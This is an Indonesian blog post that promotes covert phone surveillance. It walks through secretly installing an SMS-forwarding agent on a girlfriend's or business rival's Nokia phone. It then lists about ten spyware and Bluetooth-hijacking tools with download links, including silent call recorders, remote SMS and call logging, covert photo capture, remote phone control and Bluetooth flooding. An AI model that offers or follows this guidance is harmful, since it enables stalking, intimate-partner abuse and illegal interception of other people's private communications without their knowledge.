Beranda > 1 > Nyadap Telpon/SMS

Nyadap Telpon/SMS


Pernah gak pacar lw selalu nyembunyiin hp nya? sms ngumpet-ngumpet?… mau tau doski sms apa aja?

Mau Ngintip Lawan Bisnis Anda/Saingan dalam bisnis anda lewat sms… Gw tau cara nya nih….

Mau belajar Jadi KPK … Gw tau cara nya nih….

Menyadap sms lewat Internet dengan mendaftar ke www.bloove.com trus download file agent.sisx s60 pasang di hp yang akan di sadap… Gratis .

contoh:

misalnya Hp pacar / Traget mau lw sadap SMS nya. Hp pacar lw NOKIA N73 sebelumnya register dulu di http://www.bloove.com, di situ ada agent ID untuk sementara waktu kosongkan aja karena itu di isi dari code yang didapet dari ponsel target. setelah itu browsing di ponsel target dengan username & pasword yang sudah didapat baru download file nya, setelah terpasang di ponsel target, lw bakal dapet code (agent ID) dari hp target, masukin code tersebut di account (kosong) yag sudah terdaftar di http://www.blove.com setelah semuanya selesai.Nanti Hp tarket akan mengirim 2 pesan tapi target gak tau!!!  1 pesan dia ngirim kesiapapun (temen, lw bahkan selingkuhanya) dan tanpa sadar pesan nyang sama akan ke kirim juga  ke http://www.blove.com. otomatis di account bakal ada pesannya nanti

hihihi hayooo ketawan dech…

inget ini cuma berlaku buat pesan nyang keluar doank gak berlaku bwat pesan nyang masuk.

Tapi Kalau mau instan lagi

1) Mobile Secuware

Fitur penyadap Mobile Secuware bisa digunain utk memantau pacar aato tmen kita lewat fitur Remote Monitoringvnya. Selaen ntu Aplikasi ini dibekali kemampuan anti maling, jd klo hp ncang2 pd ilang ato di curi, kita bisa tau lewat fasilitas M-Trax (data2 nya pun bisa di selamatin)

aplikasi nya bisa di donlot di http://www.mobile-secuware.com

2) Xelnex Lite

Xelnex Lite bisa digunain utk ngerekam pembicaraan ditelpon tanpa didahului bunyi ‘beep’. jd terjaga kerahasiaaan nya,,

sayang nya aplikasi niy masih shareware alias bayar, tp kita bisa nyoba versi trial nya selama 10 hari n’ aplikasi niy kompatibel utk Symbian S60 3rd edition.

klo ada yg mo nyoba donlot aja di http://shop.psiloc.com/d/s60/XelnexLite_s603rd.sisx

3) Mobile-Spy

Pengguna hp Symbian S60 udh bisa make layanan pengintip isi hp dr jarak jauh. Dgn layanan ini mereka bisa mengetahui informasi lalu lintas sms dan telpon, yg bisa diakses dr pc ato hp laen lewwat server yg disediain.

selaen Symbian, hp yg berbasis windows Smartphone jg bisa make aplikasi niy…

sayang nya aplikasi niy juga msh trial, klo ada yg mo nyoba donlot di http://www.mobile-spy.com/MobileSpy.CAB versi trial nya cuman 7 hari

4) BT Info

aplikasi yg niy cuman memanfaatkan bluetooth doank, ya jd sama lah kya aplikasi2 laen…

klo ada yg mo nyoba, donlot di http://en.k508i.wz.cz/jar/ftp_bt_105.jar

BT Info jg bisa digunain utk ngendaliin semua fungsi hp, kaya nelpon, kamera, alarm, master reset, ampe matiin hp juga bisa.

5) Call Rrecorder dan AGLAYA Call Magic

fungsi nya cuman utk ngerekam pembicaraan telpon doank,,

klo ada yg mo nyoba, donlot disini aja http://symbianware.com <== utk Call Recorder nya

http://www.aglaya.com/symbian/symbian_software/symbian_software_download_call_magic.asp <== utk AGLAYA Call Magic nya

6) TimedSpy

klo pnya hp Symbian S60 v.2 bisa langsung make tnpa alat tambahan,,

fungsi nya utk mengintai orang, jd aplikasi nya melakukan pemotretan trus hasil nya lngsung dikirm gituu…

klo ada yg mo nyoba, donlot di http://www.diginaut.com/mobile/archive/TimedSpyTrial.sis

7) Magic Blue Hack

Aplikasi garapan Humayan Kabir Pavel dan Avishek Ahmed ini, kompatibel utk ponsel Java MIDP 2.0 berBluetooth, Symbian s60, dan PDA.

Fitur yg tersedia yaitu Make Call, Send SMS, Phonebook, Write Ph Book, Answer Call, dan Hang Call.

klo ada yg mo nyoba, donlot di http://www.getjar.com/products/175782/MagicBlueHack

BT Teror

Untuk usil2an, bisa di donlot di http://www.symbian-freak.com/downloads/app/3rd_ed/BT_Teror_S60v3.zip.

Fungsi nya untuk memanipulasi bluetooth, jd aplikasi nya utk ngirim file2 ke hp target terus2an,, jd kaya flooding gitu deh…

Aplikasi niy harus terintregrasi pula dengan program Python S60 dan Python Script Shell. Utk nge donlot Python nya bisa donlot di http://sourceforge.net/project/showfiles.php?group_id=154155

9) Mobiscope beta

Seiring kemajuan teknologi, dengan memanfaatkan jaringan internet kita bisa menikmati layanan video streaming. Jd, nnti nya kita bisa membroadcast pantauan webcam melalui server dari suatu penyedia layanan. Hingga kita bisa dengan mudah mengaksesnya lewat hp, sekalipun jarak kita jauh. Mayoritas ponsel yg beredar di pasaran bisa melakukannya, mengingat sudah dijejali teknologi bearer data (GPRS/3G).

klo ada yg mo nyoba, donlot di http://www.mobiscope.com/.

dengan aplikasi ini, kita bisa mengakses webcam lewat hp dengan aman dan nyaman. Menarik nya lg, aplikasi niy dilengkapin fitur sensor gerak dan scheduler, utk merekam situasi pada waktu tertentu.

10) SMS Anywhere

SMS Anywhere fungsi nya nge forward semua sms yg dikirim n’ diterima ponsel target ke ponsel kita.

klo ada yg mo nyoba, donlot di http://www.wireless-labs.com/smsanywhere/

Nah,, sekarang terserah ncang2 pd mo make yg mna…

tinggal di sesuain ama keadaan sekitar nya,, hehehehe….

Have fun,

About these ads
Kategori:1
  1. Belum ada komentar.
  1. No trackbacks yet.

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Logout / Ubah )

Twitter picture

You are commenting using your Twitter account. Logout / Ubah )

Facebook photo

You are commenting using your Facebook account. Logout / Ubah )

Google+ photo

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

Ikuti

Get every new post delivered to your Inbox.

%d bloggers like this: